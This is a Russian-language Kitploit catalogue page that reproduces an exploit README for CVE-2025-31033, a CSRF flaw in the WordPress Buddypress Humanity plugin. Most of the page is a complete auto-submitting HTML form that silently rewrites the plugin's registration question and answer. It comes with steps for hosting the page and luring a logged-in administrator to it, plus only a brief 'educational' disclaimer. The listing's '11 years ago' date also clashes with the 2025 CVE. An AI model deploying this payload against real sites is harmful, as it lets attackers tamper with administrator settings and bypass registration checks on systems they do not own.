Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-31033 — WordPress Buddypress Humanity Plugin <= 1.2 уязвим к межсайтовой подделке запросов (CSRF) | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-31033
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьСтатьи и ИсследованияОбучение и Образование
GitHubnxploited/cve-2025-31033

CVE-2025-31033

WordPress Buddypress Humanity Plugin <= 1.2 уязвим к межсайтовой подделке запросов (CSRF)

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

⚠️ CVE-2025-31033 - CSRF в плагине WordPress Buddypress Humanity версии <= 1.2

🛡️ Сводка уязвимости

Плагин Buddypress Humanity для WordPress (версия <= 1.2) уязвим к Межсайтовой подделке запросов (CSRF).
Эта уязвимость позволяет злоумышленнику заставить привилегированного пользователя (например, администратора) незаметно изменить настройки плагина (такие как контрольный вопрос и ответ), обходя логику проверки пользователя.


🐞 Тип уязвимости

  • Межсайтовая подделка запросов (CSRF)
  • Затронутый компонент: страница bph-settings (только для администратора)
  • CVE: CVE-2025-31033
  • Риски CVSS 9.8

🚨 Воздействие

При успешной эксплуатации эта уязвимость позволяет атакующим:

  • Изменить контрольный вопрос и ответ, используемые при регистрации пользователей
  • Обойти проверку человечности, зная новый ответ
  • Автоматизировать регистрацию пользователей (возможно, в сочетании с повышением привилегий)
  • Злоупотреблять защитой регистрационной формы без взаимодействия с пользователем

  • 🎯 Затронутый плагин

    • Название: Buddypress Humanity
    • Версия: ≤ 1.2
    • Slug: buddypress-humanity
    • Протестировано на: WordPress 6.x + активный BuddyPress

    💥 Доказательство концепции (HTML-эксплойт)

    root@kitploit:~
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <title>Exploit – CVE-2025-31033</title>
    </head>
    <body onload="document.forms[0].submit();">
      <form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
        <input type="hidden" name="bph_option[bph_title]" value="Nxploited">
        <input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
        <input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
        <input type="hidden" name="bph_submit" value="1">
      </form>
    </body>
    </html>
    

    ☠️ Как только эта страница открывается аутентифицированным администратором, она незаметно изменяет настройки плагина.


    🔧 Как использовать

    1. Разместите PoC HTML на любом внешнем сервере.
    2. Заставьте вошедшего в систему администратора WordPress посетить страницу.
    3. После посещения его браузер незаметно отправит форму.
    4. Контрольный вопрос и ответ плагина будут обновлены.
    5. Теперь злоумышленник может зарегистрироваться, используя известный ответ.

    🧪 Успешная эксплуатация приводит к:

    • Измененный вопрос: I’m Nxploited | Khaled Alenazi
    • Измененный ответ: Nxploit
    • Любой пользователь, введя «Nxploit», обойдет проверку.

    ⚠️ Отказ от ответственности

    Это доказательство концепции предназначено только для образовательных целей.
    Используйте ответственно и не тестируйте на системах, которые вам не принадлежат.
    Автор не несет ответственности за любое неправильное использование или причиненный ущерб.


    👤 Автор

    Nxploited | Khaled Alenazi

    Скачать инструмент